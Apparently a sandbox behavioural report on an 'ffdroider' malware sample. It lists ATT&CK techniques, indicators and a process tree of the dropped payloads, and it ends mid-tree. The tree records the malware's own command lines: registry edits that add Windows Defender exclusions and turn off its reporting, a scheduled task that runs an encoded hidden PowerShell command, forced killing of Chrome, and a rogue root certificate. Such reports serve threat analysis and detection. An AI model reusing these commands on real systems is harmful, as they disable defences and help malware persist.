ffdroider | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	WW14.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	AfFqfqY.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	AfFqfqY.exe.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
81	ip-api.com
18	ipinfo.io
19	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	setup777.exe.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 28 IoCs

pid	pid_target	Process	procid_target
3548	4596	WerFault.exe	85
4212	4596	WerFault.exe	85
4524	4596	WerFault.exe	85
3468	4596	WerFault.exe	85
5056	4596	WerFault.exe	85
832	3520	WerFault.exe	122
3964	2936	WerFault.exe	137
3556	440	WerFault.exe
4680	4596	WerFault.exe	85
4568	2936	WerFault.exe	137
3284	4596	WerFault.exe	85
4436	2936	WerFault.exe	137
3772	2936	WerFault.exe	137
3608	4596	WerFault.exe	85
1728	2936	WerFault.exe	137
4232	4596	WerFault.exe	85
1956	2936	WerFault.exe	137
1092	1940	WerFault.exe	180
3284	2936	WerFault.exe	137
3664	1740	WerFault.exe	182
1752	2936	WerFault.exe	137
3188	2936	WerFault.exe	137
2384	3440	WerFault.exe	181
2860	4712	WerFault.exe	107
4484	4044	WerFault.exe	212
1608	4404	WerFault.exe	210
3484	4000	WerFault.exe	205
4504	4392	WerFault.exe	207

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral2/files/0x000a000000022ef8-213.dat	nsis_installer_1
behavioral2/files/0x000a000000022ef8-213.dat	nsis_installer_2
behavioral2/files/0x000a000000022ef8-214.dat	nsis_installer_1
behavioral2/files/0x000a000000022ef8-214.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
2460	schtasks.exe
2020	schtasks.exe
4400	schtasks.exe
2384	schtasks.exe
4352	schtasks.exe
1624	schtasks.exe
3772	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3080	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
3228	taskkill.exe
1964	taskkill.exe
1944	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	WW14.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	WW14.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1100	WW14.exe
1100	WW14.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe
1548	NiceProcessX64.bmp.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 1100 wrote to memory of 1548	1100	WW14.exe	82
PID 1100 wrote to memory of 1548	1100	WW14.exe	82
PID 1100 wrote to memory of 4596	1100	WW14.exe	85
PID 1100 wrote to memory of 4596	1100	WW14.exe	85
PID 1100 wrote to memory of 4596	1100	WW14.exe	85
PID 1100 wrote to memory of 1308	1100	WW14.exe	87
PID 1100 wrote to memory of 1308	1100	WW14.exe	87
PID 1100 wrote to memory of 1308	1100	WW14.exe	87
PID 1100 wrote to memory of 4588	1100	WW14.exe	86
PID 1100 wrote to memory of 4588	1100	WW14.exe	86
PID 1100 wrote to memory of 4588	1100	WW14.exe	86
PID 1100 wrote to memory of 1496	1100	WW14.exe	89
PID 1100 wrote to memory of 1496	1100	WW14.exe	89
PID 1100 wrote to memory of 1496	1100	WW14.exe	89
PID 4588 wrote to memory of 1312	4588	AfFqfqY.exe.exe	91
PID 4588 wrote to memory of 1312	4588	AfFqfqY.exe.exe	91
PID 4588 wrote to memory of 1312	4588	AfFqfqY.exe.exe	91
PID 1100 wrote to memory of 2468	1100	WW14.exe	92
PID 1100 wrote to memory of 2468	1100	WW14.exe	92
PID 1100 wrote to memory of 2468	1100	WW14.exe	92
PID 1496 wrote to memory of 4432	1496	utube.bmp.exe	94
PID 1496 wrote to memory of 4432	1496	utube.bmp.exe	94
PID 1496 wrote to memory of 4432	1496	utube.bmp.exe	94
PID 4588 wrote to memory of 4040	4588	AfFqfqY.exe.exe	96
PID 4588 wrote to memory of 4040	4588	AfFqfqY.exe.exe	96
PID 4588 wrote to memory of 4040	4588	AfFqfqY.exe.exe	96
PID 4432 wrote to memory of 2592	4432	Install.exe	101
PID 4432 wrote to memory of 2592	4432	Install.exe	101
PID 4432 wrote to memory of 2592	4432	Install.exe	101
PID 1100 wrote to memory of 3728	1100	WW14.exe	100
PID 1100 wrote to memory of 3728	1100	WW14.exe	100
PID 1100 wrote to memory of 3728	1100	WW14.exe	100
PID 4040 wrote to memory of 2088	4040	cmd.exe	102
PID 4040 wrote to memory of 2088	4040	cmd.exe	102
PID 4040 wrote to memory of 2088	4040	cmd.exe	102

C:\Users\Admin\AppData\Local\Temp\WW14.exe
"C:\Users\Admin\AppData\Local\Temp\WW14.exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1100
- C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
  "C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1548
- C:\Users\Admin\Pictures\Adobe Films\Mixinte23.bmp.exe
  "C:\Users\Admin\Pictures\Adobe Films\Mixinte23.bmp.exe"
  2⤵
  - Executes dropped EXE
  PID:4596
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 452
    3⤵
    - Program crash
    PID:3548
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 764
    3⤵
    - Program crash
    PID:4212
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 772
    3⤵
    - Program crash
    PID:4524
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 772
    3⤵
    - Program crash
    PID:3468
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 796
    3⤵
    - Program crash
    PID:5056
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 852
    3⤵
    - Program crash
    PID:4680
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 844
    3⤵
    - Program crash
    PID:3284
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 1356
    3⤵
    - Program crash
    PID:3608
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "Mixinte23.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixinte23.bmp.exe" & exit
    3⤵
    PID:1144
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "Mixinte23.bmp.exe" /f
      4⤵
      Kills process with taskkill
      PID:1964
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 540
    3⤵
    - Program crash
    PID:4232
- C:\Users\Admin\Pictures\Adobe Films\AfFqfqY.exe.exe
  "C:\Users\Admin\Pictures\Adobe Films\AfFqfqY.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c HajsdiEUeyhauefhKJAsnvnbAJKSdjhwiueiuwUHQWIr8
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c cmd < Puo.doc
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:2088
    - - C:\Windows\SysWOW64\find.exe
        
        find /I /N "psuaservice.exe"
        5⤵
        
        PID:3320
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FI "imagename eq PSUAService.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:3080
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^GenDLGIWHnMRujmupBwmZpYQQwklmcAtydrRzguPaJSafGltEekhEEBbrHMJcnvjYIMPoIMUxkuddGBlQiFbpjmAOFNMBbxUhGxHUcVWddSankibuCSgS$" Stoffe.doc
        5⤵
        
        PID:3484
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Spinetta.exe.pif
        
        Spinetta.exe.pif z
        5⤵
        
        PID:3140
- C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe
  "C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  PID:1308
- C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe
  "C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1496
- - C:\Users\Admin\AppData\Local\Temp\7zSDD55.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Users\Admin\AppData\Local\Temp\7zSE7C5.tmp\Install.exe
      .\Install.exe /S /site_id "525403"
      4⤵
      Executes dropped EXE
      Checks BIOS information in registry
      Enumerates system info in registry
      PID:2592
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:4248
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:1940
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:1384
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:4440
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:4268
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:3600
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:4512
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:1872
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gyHojHsdJ" /SC once /ST 18:24:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:1624
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gyHojHsdJ"
        5⤵
        
        PID:1756
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gyHojHsdJ"
        5⤵
        
        PID:5108
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bfqaWfIvSxIbjvrIXL" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YdAIlVMUmInzfjlkV\onwvojrRqVPwWCr\hYjZPLA.exe\" mN /site_id 525403 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:3772
- C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe
  "C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2468
- - C:\Windows\SysWOW64\control.exe
    "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\JBDF.Cpl",
    3⤵
    PID:3692
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\JBDF.Cpl",
      4⤵
      PID:4168
    - - C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\JBDF.Cpl",
        5⤵
        
        PID:4756
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\JBDF.Cpl",
        6⤵
        
        PID:4248
- C:\Users\Admin\Pictures\Adobe Films\download2.exe.exe
  "C:\Users\Admin\Pictures\Adobe Films\download2.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3728
- - C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
    "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
    3⤵
    PID:4712
  - - C:\Users\Admin\AppData\Local\Temp\9CBCH.exe
      "C:\Users\Admin\AppData\Local\Temp\9CBCH.exe"
      4⤵
      PID:4000
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 1868
        5⤵
        Program crash
        
        PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\HM045.exe
      "C:\Users\Admin\AppData\Local\Temp\HM045.exe"
      4⤵
      PID:4392
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1220
        5⤵
        Program crash
        
        PID:4504
  - - C:\Users\Admin\AppData\Local\Temp\28JBM.exe
      "C:\Users\Admin\AppData\Local\Temp\28JBM.exe"
      4⤵
      PID:4404
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 924
        5⤵
        Program crash
        
        PID:1608
  - - C:\Users\Admin\AppData\Local\Temp\25HBG.exe
      "C:\Users\Admin\AppData\Local\Temp\25HBG.exe"
      4⤵
      PID:4044
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 1780
        5⤵
        Program crash
        
        PID:4484
  - - C:\Users\Admin\AppData\Local\Temp\AFCI3.exe
      "C:\Users\Admin\AppData\Local\Temp\AFCI3.exe"
      4⤵
      PID:1840
    - - C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /U SL5G26.S -S
        5⤵
        
        PID:2544
  - - C:\Users\Admin\AppData\Local\Temp\AFCI3K813DEDEE9.exe
      https://iplogger.org/1QuEf7
      4⤵
      PID:4504
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 552
      4⤵
      Program crash
      PID:2860
- - C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe
    "C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe"
    3⤵
    PID:4700
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im chrome.exe
      4⤵
      PID:5108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        5⤵
        Kills process with taskkill
        
        PID:3228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      4⤵
      PID:5024
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbdc7c4f50,0x7ffbdc7c4f60,0x7ffbdc7c4f70
        5⤵
        
        PID:2044
- - C:\Users\Admin\AppData\Local\Temp\yangyang.exe
    "C:\Users\Admin\AppData\Local\Temp\yangyang.exe"
    3⤵
    PID:4192
  - - C:\Users\Admin\AppData\Local\Temp\yangyang.exe
      "C:\Users\Admin\AppData\Local\Temp\yangyang.exe" -h
      4⤵
      PID:5100
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    PID:3832
  - - C:\Users\Admin\AppData\Local\Temp\is-EI6LD.tmp\setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-EI6LD.tmp\setup.tmp" /SL5="$10212,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe"
      4⤵
      PID:2912
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
        5⤵
        
        PID:4076
      - C:\Users\Admin\AppData\Local\Temp\is-IT5OG.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IT5OG.tmp\setup.tmp" /SL5="$2021E,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
        6⤵
        
        PID:3604
- - C:\Users\Admin\AppData\Local\Temp\rtst1077.exe
    "C:\Users\Admin\AppData\Local\Temp\rtst1077.exe"
    3⤵
    PID:3520
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3520 -s 860
      4⤵
      Program crash
      PID:832
- - C:\Users\Admin\AppData\Local\Temp\mjk_tyi.exe
    "C:\Users\Admin\AppData\Local\Temp\mjk_tyi.exe"
    3⤵
    PID:3044
- - C:\Users\Admin\AppData\Local\Temp\inst002.exe
    "C:\Users\Admin\AppData\Local\Temp\inst002.exe"
    3⤵
    PID:3856
- - C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
    "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
    3⤵
    PID:1376
  - - C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
      C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
      4⤵
      PID:2516
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--uOyLnaD1"
        5⤵
        
        PID:1120
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1cc,0x210,0x7ffbd9c7dec0,0x7ffbd9c7ded0,0x7ffbd9c7dee0
        6⤵
        
        PID:2052
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --mojo-platform-channel-handle=2044 /prefetch:8
        6⤵
        
        PID:4548
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --mojo-platform-channel-handle=2052 /prefetch:8
        6⤵
        
        PID:1872
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
